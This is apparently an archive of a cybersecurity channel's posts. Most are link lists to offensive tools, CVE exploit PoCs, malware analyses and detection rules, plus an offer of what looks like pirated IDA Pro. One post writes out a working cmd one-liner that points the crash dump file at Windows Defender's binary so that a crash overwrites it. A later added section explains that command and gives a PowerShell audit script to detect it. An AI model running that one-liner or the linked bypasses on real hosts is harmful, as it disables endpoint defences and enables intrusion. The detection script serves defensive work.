İbrahim BALOĞLU - Siber Güvenlik Paylaşımları

This group was created to share content in the field of cyber security.

1 071 subscribers
Post archive
#tools #MLSecOps 1. Access large language models from CLI https://github.com/simonw/llm 2. CVE-2023-44467: RCE in langchain PALChain https://arimlabs.ai/news/bypass-of-cve-2023-44467 3. AI Agent Security https://www.promptfoo.dev/blog/agent-security ]-> https://www.promptfoo.dev/docs/red-team/agents

IDA PRO 9.1 * Windows/Linux/macOS + bundles + SDK * DownLoad_me

#tools #Blue_Team_Techniques 1. Static Analysis of GUID Encoded Shellcode https://isc.sans.edu/diary/Static+Analysis+of+GUID+Encoded+Shellcode/31774 2. Sigma Rule for CVE-2025-29927 (Next.js) Detection https://github.com/elshaheedy/CVE-2025-29927-Sigma-Rule ]-> Nuclei template 3. CVE-2025-30066 Detection Tool https://github.com/Checkmarx/Checkmarx-CVE-2025-30066-Detection-Tool

Security Operations Specialist (SOC Analyst) https://www.linkedin.com/jobs/view/4186266416

#Offensive_security #Red_Team_Tactics NoSQL injection Part 1 - General details Part 2 - Getting rid of pre-/post-conditions in NoSQLi Part 3 - NoSQL error-based injection

#tools #Offensive_security 1. Extensive and updated reference for 403 (Forbidden) bypass techniques for pentesters https://github.com/Arcanum-Sec/hack_tips/blob/main/403bypass.md 2. 32/64-bit position independent implant template https://github.com/Cracked5pider/Stardust 3. goLAPS - Retrieve LAPS passwords from a domain https://github.com/sensepost/goLAPS 4. AMSI Bypass: In-memory patching https://medium.com/@drop_tables/amsi-bypass-in-memory-patching-e9b4abbc617e

#Red_Team_Tactics 1. New Method to Leverage Unsafe Reflection and Deserialisation to RCE on Rails https://www.elttam.com/blog/rails-sqlite-gadget-rce 2. Tool to automate GPO attack vectors through NTLM relaying https://github.com/synacktiv/GPOddity

#Tech_book "Security Automation with Python: Practical Python solutions for automating and scaling security operations", 2025.

#exploit 1. CVE-2025-27636, CVE-2025-29891: Apache Camel RCE PoC/Detection 2. CVE-2024-0760: DoS in ISC BIND DNS 3. CVE-2025-24813: Apache Tomcat RCE 4. CVE-2015-0009: SMB Security Feature Bypass (SMB Signing) 5. CVE-2024-0582, CVE-2024-35880: A Series of io_uring pbuf Vulnerabilities

BurpSuite Extension * Xkeys

CVE-2025-27364 * MITRE Caldera Security Advisory — Remote Code Execution * POC

#Tech_book #reversing "Mastering Reverse Engineering: Re-engineer your ethical hacking skills", 2018. ]-> https://github.com/PacktPublishing/Mastering-Reverse-Engineering

#Malware_analysis 1. Havoc: SharePoint with Microsoft Graph API turns into FUD C2 https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2 2. Deep Dive Into Allegedly AI-Generated FunkSec Ransomware https://hybrid-analysis.blogspot.com/2025/03/hybrid-analysis-deep-dive-into.html 3. Uncovering .NET Malware Obfuscated by Encryption and Virtualization https://unit42.paloaltonetworks.com/malware-obfuscation-techniques

#tools #Red_Team_Tactics 1. Draugr - BOF with Synthetic Stackframe https://github.com/NtDallas/Draugr 2. Thread Hijacking Iceberg: Deep Dive into Phantom Call & RtlRemoteCall https://sabotagesec.com/thread-hijacking-iceberg-deep-dive-into-phantom-call-rtlremotecall 3. Cobalt Strike BOF that leverages WinRM plugins to execute arbitrary DLLs in a target system https://github.com/FalconForceTeam/bof-winrm-plugin-jump

#DFIR #Malware_analysis 1. WMI Malware: The Complete Forensics Guide https://www.cybertriage.com/blog/wmi-malware 2. Confluence Exploit Leads to LockBit Ransomware https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware

CVE-2025-0108 Palo Alto Networks PAN-OS * POC exploit

EDR dump (for fun, of course)
cmd /v/c "set R=reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /f /v&!R! CrashDumpEnabled /d 7 /t 4&!R! DumpFileSize /d 666 /t 4&for /f "delims=*" %i in ('sc qc WinDefend^|find "PATH_"')do (set t=%i&!R! DedicatedDumpFile /d !t:~29,-1!)"
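Added example, not part of the channel post above: the one-liner reads the WinDefend service's BINARY_PATH_NAME via `sc qc`, strips the quotes, and writes that path into CrashControl\DedicatedDumpFile (with CrashDumpEnabled=7 and DumpFileSize=666), so the next crash dump is written over the service binary. The defensive check a practitioner would want is to audit those CrashControl values and flag a DedicatedDumpFile that matches any installed service's binary path or does not look like a .dmp file. The script below is my own PowerShell; it assumes it runs with rights to read HKLM and Win32_Service, and it makes no claim about any specific product beyond what the post's command touches.

```powershell
# Added example (not from the original post): audit CrashControl for a
# DedicatedDumpFile that has been pointed at a service binary.
$key = 'HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl'
$cc  = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue

$dump = $cc.DedicatedDumpFile
if (-not $dump) {
    Write-Output 'No DedicatedDumpFile configured under CrashControl'
    return
}

# Service binaries as shown by `sc qc` (BINARY_PATH_NAME), quotes and
# trailing arguments stripped so they compare cleanly against $dump.
$svcPaths = Get-CimInstance Win32_Service | ForEach-Object {
    if ($_.PathName -match '^"([^"]+)"') { $matches[1] }
    else { ($_.PathName -split ' ')[0] }
}

# Two independent signals: the dump target is an existing service binary,
# or the dump target does not even end in .dmp.
$matchedService = $svcPaths | Where-Object { $_ -and ($_ -ieq $dump) }
$notDmp         = -not ($dump -match '\.dmp$')

[pscustomobject]@{
    CrashDumpEnabled   = $cc.CrashDumpEnabled   # 7 = automatic memory dump
    DumpFileSize       = $cc.DumpFileSize       # MB; the post sets 666
    DedicatedDumpFile  = $dump
    MatchesServiceExe  = [bool]$matchedService
    NotDmpExtension    = $notDmp
    Suspicious         = ([bool]$matchedService) -or $notDmp
}
```

Run it as part of a baseline or host-triage script; any host where Suspicious is true warrants comparing the current CrashControl values against the last known-good configuration before the next reboot, since the dump is only written when the machine actually crashes.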

CVE-2024-12754 AnyDesk * wtf * LPE poc exploit